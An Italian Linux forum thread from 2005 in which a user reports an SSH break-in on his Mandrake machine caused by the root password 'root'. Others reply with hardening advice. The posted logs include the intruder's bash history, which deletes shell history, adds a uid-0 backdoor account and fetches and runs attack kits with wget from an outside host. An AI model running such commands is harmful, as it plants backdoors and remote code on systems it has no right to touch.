Attacchi Lamer

da **Sari** » mer feb 16, 2005 22:37

Salve a tutti e´ la prima volta che posto in questo Forum e lo faccio per necessita visto che appena mi muniro´ di un router passero´ a Linux Slackware. Metto su questo forum la discussione per un semplice motivo : Ieri alle 21:25 sono stato vittima di un attacco Lamer in piena regola, dai log risulta qualche frangente di questo attacco, non so pero´ per cosa abbiano usato il mio computer e la mia connessione

, fortunatamente non avevo dati importanti che potessero essere trafugati. Sono stato attaccato mentre sul mio sistema era in funzione una distro Mandrake, la mandrake 10.1, e per questo motivo la abbandono e passo a slackware consigliata vivamente da un amico. D´ora in poi della sicurezza faro´ il mio punto forte. Spero in questo forum di trovare aiuto visto che so della maggiore difficolta´ di utilizzo di slackware, ma cio´ non mi spaventa, l´amico google e forum come questi credo siano sufficenti per avere l´aiuto di cui ho bisogno. Sto gia leggendo con gusto l´utile slackware for dummies e sto trovando molte risposte, spero tutte quelle di cui ho bisogno. Ho gia trovato la risposta al problema ATI

Con questo mio primo post colgo l´occasione per salutare tutti e per dire w Slackware e dio me la mandi buona

(che gia ho usato per un piccolo serverino a casa di un amico). P.S.: aspettatevi entro qualche giorno domande a raffica ( non preoccupatevi prima faro´ di tutto per risolvere da me almeno imparo poi passero´ di qui

).

da **Loris** » mer feb 16, 2005 23:09

Sari benvenuto nel mondo Slackware

p.s. Sarebbe bello capire come hanno fatto questi Lamer a entrare nel tuo sistema, i log che dicono ?

da **Sari** » mer feb 16, 2005 23:17

posto di seguito alcuni logggoni

non so se sono utili a sapere qualcosa ma sono gli unici rimasti ... primo rimasto e´ il log della bash di Root w dir -a rm -rf .bash_history .bash_logout .fullcircle .ICEauthority .rfbdrake .vimrc ls dir -a rm -rf .bash_profile .bashrc /usr/sbin/adduser admin -g0 -o -u0 passwd admin cat /etc/issue /sbin/ifconfig cd /var/tmp wget bone.go.ro/mirkforce.tgz tar -xzvf mirkforce.tgz rm -rf mirkforce.tgz cd ./ecmf/ ./mirkforce cd .. ls rm -rf ./ecmf/ cd /var/spool/samba/ ls wget bone.go.ro/hait.tgz tar -xzvf hait.tgz rm -rf hait.tgz cd ssh/ ./go.sh 210.21 cd .. ls rm -rf ssh/ wget bone.go.ro/bone.tgz tar -xzvf bone.tgz rm -rf bone.tgz cd " " ls mv lroot init export PATH=.:$PATH init cd " " ls wget bone.go.ro/treeball.tgz tar -xzvf treeball.tgz dir -a rm -rf treeball.tgz ls Come si note han creato l´utente Admin, quello che mi insospettito all´avvio di mandrakkia, e poi il resto e´ storia

. e questo i log Auth in var/log Feb 15 21:20:00 francesco sshd[21706]: Did not receive identification string from 127.0.0.1 Feb 15 21:21:18 francesco sshd[21763]: Invalid user test from 217.29.80.92 Feb 15 21:21:18 francesco sshd[21763]: error: Could not get shadow information for NOUSER Feb 15 21:21:18 francesco sshd[21763]: Failed password for invalid user test from 217.29.80.92 port 13155 ssh2 Feb 15 21:21:20 francesco sshd[21765]: Invalid user guest from 217.29.80.92 Feb 15 21:21:20 francesco sshd[21765]: error: Could not get shadow information for NOUSER Feb 15 21:21:20 francesco sshd[21765]: Failed password for invalid user guest from 217.29.80.92 port 13239 ssh2 Feb 15 21:21:22 francesco sshd[21770]: Invalid user admin from 217.29.80.92 Feb 15 21:21:22 francesco sshd[21770]: error: Could not get shadow information for NOUSER Feb 15 21:21:22 francesco sshd[21770]: Failed password for invalid user admin from 217.29.80.92 port 13315 ssh2 Feb 15 21:21:25 francesco sshd[21772]: Invalid user admin from 217.29.80.92 Feb 15 21:21:25 francesco sshd[21772]: error: Could not get shadow information for NOUSER Feb 15 21:21:25 francesco sshd[21772]: Failed password for invalid user admin from 217.29.80.92 port 13439 ssh2 Feb 15 21:21:27 francesco sshd[21777]: Invalid user user from 217.29.80.92 Feb 15 21:21:27 francesco sshd[21777]: error: Could not get shadow information for NOUSER Feb 15 21:21:27 francesco sshd[21777]: Failed password for invalid user user from 217.29.80.92 port 13538 ssh2 Feb 15 21:21:29 francesco sshd[21779]: Failed password for root from 217.29.80.92 port 13627 ssh2 Feb 15 21:21:31 francesco sshd[21784]: Accepted password for root from 217.29.80.92 port 13700 ssh2 Feb 15 21:22:06 francesco sshd[21845]: Accepted password for root from 81.181.153.217 port 1251 ssh2 Feb 15 21:22:57 francesco adduser[21925]: new user: name=admin, uid=0, gid=0, home=/home/admin, shell=/bin/bash Feb 15 21:23:04 francesco passwd(pam_unix)[21929]: password changed for admin Feb 15 21:25:00 francesco sshd[22060]: Did not receive identification string from 127.0.0.1 Feb 15 21:30:00 francesco sshd[22316]: Did not receive identification string from 127.0.0.1 Feb 15 21:33:53 francesco xinetd[5064]: START: sgi_fam pid=22502 from=<no address> Feb 15 21:35:01 francesco sshd[22580]: Did not receive identification string from 127.0.0.1 Feb 15 21:40:00 francesco sshd[22840]: Did not receive identification string from 127.0.0.1 Feb 15 21:45:01 francesco sshd[23085]: Did not receive identification string from 127.0.0.1 Feb 15 21:50:00 francesco sshd[23313]: Did not receive identification string from 127.0.0.1 Feb 15 21:55:00 francesco sshd[23526]: Did not receive identification string from 127.0.0.1 Feb 15 22:00:00 francesco sshd[23740]: Did not receive identification string from 127.0.0.1 si nota solo l´ora di inizio e poco altro apparte il loro ip

ma ovviamente saran passati da proxy o avran cmqe usato qualcosa per renderlo inutile ... Ovviamente prima dei suddetti log avran fatto qualcosa per avere i privilegi di root o roba simile, non sono un esperto pultroppo.

da **Sari** » mer feb 16, 2005 23:28

A gia mi son dimenticato di dire anche che il computer era inagibile questa mattina quando sono andato a vedere come stava (e´ accesso molte ore al giorno anche di notte), errori sopra errori (oserei dire orrori), e ovvio ora lo raso a zero per cancellare ogni possibile problema.

da **Michele84** » gio feb 17, 2005 14:46

Gia gia... ti hanno proprio "bucato" !!! Dovresti capire però come sono riusciti ad entrare e ad avere accesso a previlegi di root. Pure il mio pc è sempre acceso e quasi sempre trovo log di ip che provano ad entrare. In ogni caso riesco a vedere quello che fanno grazie al log di syslog e message. Molte delle volte questi cracker riescono ad entrare tramite una falla del sito web o qualcosa di simile. Ciauz!

da **Sari** » ven feb 18, 2005 10:59

I log di Syslog sono andati a farsi benedire ghgh, hanno bruciato praticamente tutto, mi sono trovato il pc che non si avviava se non in modalita´ testuale (e per mandrake e´ moolto strano), con la maggior parte dei comandi stile cp che davano segmentation fault. Per fortuna le partizioni non sono state corrotte o rovinate cosi´ son riuscito a montarle. Sicuramente han fatto casini grossi per togliere ogni traccia importante. Sono felice di aver avuto windows (per la prima volta

) in una parte dell´hard-disk cosi´ ho potuto con qualche peripezia scartabellare le ext3 e salvare i dati importanti sulla partizione ntfs. E per fortuna che tengo i backup dei dati su NTFS cosi´ son sicuro che non hanno scritto o fatto nulla almeno li dentro (almeno cosi´ credo). Anzi domandona (se sparo una cavolata non uccidetemi ghgh): Secondo il vostro parere e´ possibile che accendendo da ssh ad un computer linux con partizioni ntfs montate con accesso solo in lettura per ovvi motivi (parlo di mandrake), possano riuscire in qualche modo a scrivere su quest´ultime? che ne so qualche programma o utility particolare da sfruttare? P.S.: Oggi pomeriggio assieme ad un amico compro il router ed installo slackware se tutto va bene stasera dovrei scrivere il mio primo messaggio con slacky

da **useless** » ven feb 18, 2005 11:26

<TABLE BORDER=0 ALIGN=CENTER WIDTH=85%><TR><TD>Quote:<HR></TD></TR><TR><TD><BLOCKQUOTE> 18-02-2005 alle ore 09:59, Sari : Secondo il vostro parere e´ possibile che accendendo da ssh ad un computer linux con partizioni ntfs montate con accesso solo in lettura per ovvi motivi (parlo di mandrake), possano riuscire in qualche modo a scrivere su quest´ultime? che ne so qualche programma o utility particolare da sfruttare? </BLOCKQUOTE></TD></TR><TR><TD><HR></TD></TR></TABLE> se diventano root possono tranquillamente usare dd o qualsiasi tool che accede al disco come dispositivo a blocchi.

da **People** » ven feb 18, 2005 12:18

Si... sono d´accordo con lorys... sarebbe interessante capire.... Ma il pc era su internet... come server web? Avevi altri servizi attivi? Possono aver avuto accesso alla macchina... fisicamente? Non per farmi gli affari tuoi.... ;-)

ma perchè, secondo me, la tua esperienza può essere utile anche ad altri! Ciao P.

da **manny** » ven feb 18, 2005 12:24

Bella storia, la tua password doveva essere veramente semplice se hanno impiegato così poco tempo per farti fuori; non credo che abbiano fatto saltare ssh, l´ultima versione è al sicuro da exploit...il tutto per dirti che anche montando una slackware NON sei al sicuro se non disabiliti servizi che non ti servono (vedi telnet, finger, ssh) e se non crei qualche restrizione di accesso, e utilizzando password - non solo lunghe - ma complicate. Per ssh per esempio puoi impostare nel sshd_config un solo utente che puo collegarsi e INIBIRE l´accesso come root: diventerai successivamente root col comando su. In questo modo crei una doppia complicazione per l´attaccante: non conosce già un utente (cioè root) dovendo poi solo indovinare la passwd ma dovrà conoscere l´utente abilitato a collegarsi via ssh + la sua passwd. Dai un´occhiata veloce a <a href="http://www.valtellinux.it/blindolinux/blindolinux.htm" target="_blank" target="_new">http://www.valtellinux.it/blindolinux/blindolinux.htm</a> Ciao! Manny

da **People** » ven feb 18, 2005 13:33

Perdonate.... io sono abbastanza ignorante in materia... se non ho interpretato male il log... hanno "indovonato" la password di root?? P.

da **manny** » ven feb 18, 2005 13:41

<TABLE BORDER=0 ALIGN=CENTER WIDTH=85%><TR><TD>Quote:<HR></TD></TR><TR><TD><BLOCKQUOTE> 18-02-2005 alle ore 12:33, People : Perdonate.... io sono abbastanza ignorante in materia... se non ho interpretato male il log... hanno "indovonato" la password di root?? P. </BLOCKQUOTE></TD></TR><TR><TD><HR></TD></TR></TABLE> Anch´io non ne so molto, ma da quello che vedo la macchina si chiamava francesco e l´attaccante stava provando diversi utenti e password per loggarsi. Ad un certo punto ha centrato quella di root, probabilmente perchè root oltretutto non era inibito all´accesso dal config di ssh...come l´abbia trovata non lo so, per fortuna o da qualche altra parte, ma da quello che vedo dai log così mi sembra. Ciao, Manny

da **useless** » ven feb 18, 2005 13:55

ti va di dirci qual era la tua password di root? così, per curiosità!

da **touchstyle** » ven feb 18, 2005 15:20

Questa sporca faccenda mi ha fatto riflettere... Gli utenti che utilizzano Linux secondo me si dividono in 3: - quelli che non sanno niente ---> Mandrake - quelli che vogliono imparare ---> Slack - quelli che gia sanno ---> Slack ricompilata ad hoc. Con questo voglio dire che l´utente che si avvicina al pinguino con le ultime distro (Mandrake dalla 9 in poi, Suse >8.2, Fedora ecc...) pensano di trovarsi su un sistema sicuro e al riparo da intrusioni. Questo purtroppo non è vero. Linux, se non configurato a dovere (lo so, ci vuole poco), avvia servizi che qualcuno può sfruttare volontariamente in maniera non legittima. La fortuna é che per poter accedere ad un sistema basato su linux serve SAPERE, e chi è in possesso di queste informazioni normalmente NON le usa per scopi lamerosi o crakkosi, in quanto la nobiltà d´animo è proporzionale alla conoscienza, a mio avviso. Naturalmente le mele marce esistono, e si sa che il "male" fa rumore, mentre il "bene" è un vento silenzioso. Tutta ´sta menata per dire cosa? Beh, per proporre che nel nuovo Slack4Dumm, ci sia una sezione dedicata alla sicurezza "domestica" con: - come proteggere la macchina che si usa per navigare/posta/lopster; - come controllare i files di log (argomento VIP!); - come testare se la macchina è sicura e da cosa. Bon, basta. Son stuf,go scrito massa! :-o

Ou fioi, forse cambio piccì! :-] Togo un P3-700 da Simpaticotech, a 190 euri? Fasso ben? Se fossi gatto, miao. Se fossi cane, bao. Se fosse tardi... ciao. Touch

da **Sari** » ven feb 18, 2005 21:29

Ok so che mi prendero´ del deficente ghgh. Ora vi svelero´ la mia password di root, quella vecchia ovviamente ora l´ho cambiata, dagli errori si impara ... Pronti? Vi siete seduti comodamente con i popcorn e una birra fresca? Pronti a sentire la frase che vi fara´ ridere per mille anni dell´idiozia di un uomo? .... La mia password di root era ... ROOT ......... Ok ora potete uccidermi .......

da **Sari** » ven feb 18, 2005 21:29

a gia dimenticavo ... Ho vinto qualche cossa?!?!? ... dai perlomeno sono entrato nell´albo d´oro delle cavolate o no?

Chi c’è in linea